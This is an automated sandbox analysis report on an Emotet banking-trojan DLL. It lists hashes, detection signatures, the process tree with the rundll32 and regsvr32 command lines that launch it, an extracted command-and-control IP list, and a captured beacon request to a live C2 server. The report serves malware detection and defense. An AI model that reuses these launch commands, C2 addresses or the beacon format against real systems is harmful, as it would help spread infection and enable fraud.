Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5CUFfVMSaQ

Overview

General Information

Sample Name:5CUFfVMSaQ (renamed file extension from none to dll)
Analysis ID:671666
MD5:5d4728494832d03bbfb75367836fef4e
SHA1:abcbd283801a05390995862f59dcb5310f3d3d88
SHA256:caa60b9025dfba07efac6cae5438a8e20d9b7c210a721a4cf1f9d7b6df4d7d90
Tags:exeOpenCTIBRSandboxed
Infos:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Connects to several IPs in different countries
Registers a DLL
PE file contains more sections than normal
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7016 cmdline: loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7024 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 7032 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 7132 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7108 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6160 cmdline: rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["108.194.0.0:443", "40.4.0.0:1", "4.4.0.0:1", "8.4.0.0:1", "24.4.0.0:1", "232.3.0.0:1", "20.4.0.0:1", "236.3.0.0:1", "36.4.0.0:1", "139.247.2.0:2096", "160.153.244.0:1", "21.115.0.0:4", "133.247.2.0:4048", "4.1.0.0:92", "224.146.244.0:1", "120.247.2.0:4048", "121.247.2.0:5104", "160.154.244.0:1", "141.247.2.0:5104", "160.147.244.0:1", "143.247.2.0:4544", "160.156.244.0:1", "145.247.2.0:2912", "224.150.244.0:1", "153.247.2.0:1324"]}
SourceRuleDescriptionAuthorStrings
5CUFfVMSaQ.dllJoeSecurity_Emotet_2Yara detected EmotetJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Joe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              3.2.rundll32.exe.25325750000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.1130000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  4.2.rundll32.exe.237550f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    6.2.regsvr32.exe.1130000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      2.2.regsvr32.exe.2810000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        Click to see the 5 entries
                        No Sigma rule has matched
                        Timestamp:192.168.2.5188.165.79.151497724432404320 07/22/22-13:16:45.923727
                        SID:2404320
                        Source Port:49772
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 5CUFfVMSaQ.dllVirustotal: Detection: 21%Perma Link
                        Source: 5CUFfVMSaQ.dllMetadefender: Detection: 45%Perma Link
                        Source: 5CUFfVMSaQ.dllReversingLabs: Detection: 80%
                        Source: 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["108.194.0.0:443", "40.4.0.0:1", "4.4.0.0:1", "8.4.0.0:1", "24.4.0.0:1", "232.3.0.0:1", "20.4.0.0:1", "236.3.0.0:1", "36.4.0.0:1", "139.247.2.0:2096", "160.153.244.0:1", "21.115.0.0:4", "133.247.2.0:4048", "4.1.0.0:92", "224.146.244.0:1", "120.247.2.0:4048", "121.247.2.0:5104", "160.154.244.0:1", "141.247.2.0:5104", "160.147.244.0:1", "143.247.2.0:4544", "160.156.244.0:1", "145.247.2.0:2912", "224.150.244.0:1", "153.247.2.0:1324"]}
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800426C8 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800426C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800436B4 FindFirstFileExW,2_2_00000001800436B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004383C FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_000000018004383C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043DBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0000000180043DBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930A20 FindFirstFileW,FindNextFileW,6_2_02930A20

                        Networking

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 188.165.79.151 443Jump to behavior
                        Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.5:49772 -> 188.165.79.151:443
                        Source: Malware configuration extractorIPs: 108.194.0.0:443
                        Source: Malware configuration extractorIPs: 40.4.0.0:1
                        Source: Malware configuration extractorIPs: 4.4.0.0:1
                        Source: Malware configuration extractorIPs: 8.4.0.0:1
                        Source: Malware configuration extractorIPs: 24.4.0.0:1
                        Source: Malware configuration extractorIPs: 232.3.0.0:1
                        Source: Malware configuration extractorIPs: 20.4.0.0:1
                        Source: Malware configuration extractorIPs: 236.3.0.0:1
                        Source: Malware configuration extractorIPs: 36.4.0.0:1
                        Source: Malware configuration extractorIPs: 139.247.2.0:2096
                        Source: Malware configuration extractorIPs: 160.153.244.0:1
                        Source: Malware configuration extractorIPs: 21.115.0.0:4
                        Source: Malware configuration extractorIPs: 133.247.2.0:4048
                        Source: Malware configuration extractorIPs: 4.1.0.0:92
                        Source: Malware configuration extractorIPs: 224.146.244.0:1
                        Source: Malware configuration extractorIPs: 120.247.2.0:4048
                        Source: Malware configuration extractorIPs: 121.247.2.0:5104
                        Source: Malware configuration extractorIPs: 160.154.244.0:1
                        Source: Malware configuration extractorIPs: 141.247.2.0:5104
                        Source: Malware configuration extractorIPs: 160.147.244.0:1
                        Source: Malware configuration extractorIPs: 143.247.2.0:4544
                        Source: Malware configuration extractorIPs: 160.156.244.0:1
                        Source: Malware configuration extractorIPs: 145.247.2.0:2912
                        Source: Malware configuration extractorIPs: 224.150.244.0:1
                        Source: Malware configuration extractorIPs: 153.247.2.0:1324
                        Source: Joe Sandbox ViewASN Name: TCISLTataCommunicationsIN TCISLTataCommunicationsIN
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==Host: 188.165.79.151Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                        Source: unknownNetwork traffic detected: IP country count 10
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.165.79.151
                        Source: svchost.exe, 00000014.00000003.624845071.0000024E7156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-22T07:55:01.8237416Z||.||b7e2ac48-308b-4ab0-ad70-c01dd95863e0||1152921505695074449||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: svchost.exe, 00000014.00000003.624845071.0000024E7156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-22T07:55:01.8237416Z||.||b7e2ac48-308b-4ab0-ad70-c01dd95863e0||1152921505695074449||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: regsvr32.exe, 00000006.00000003.502653267.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964551145.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                        Source: regsvr32.exe, 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502763451.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502855478.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.165.79.151/
                        Source: regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.165.79.151/oA~
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                        Source: svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                        Source: svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                        Source: svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                        Source: svchost.exe, 00000014.00000003.647804814.0000024E7158E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646539654.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646486184.0000024E71A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C324 InternetReadFile,6_2_0292C324
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==Host: 188.165.79.151Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.165.79.151:443 -> 192.168.2.5:49772 version: TLS 1.2

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5CUFfVMSaQ.dll, type: SAMPLE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll:Zone.IdentifierJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\NCybOKcMqaEIN\Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C00C2_2_000000018001C00C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E0382_2_000000018001E038
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E2242_2_000000018001E224
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C23C2_2_000000018001C23C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A2482_2_000000018001A248
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A3902_2_000000018001A390
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800143D42_2_00000001800143D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E4242_2_000000018001E424
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C46C2_2_000000018001C46C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4D82_2_000000018001A4D8
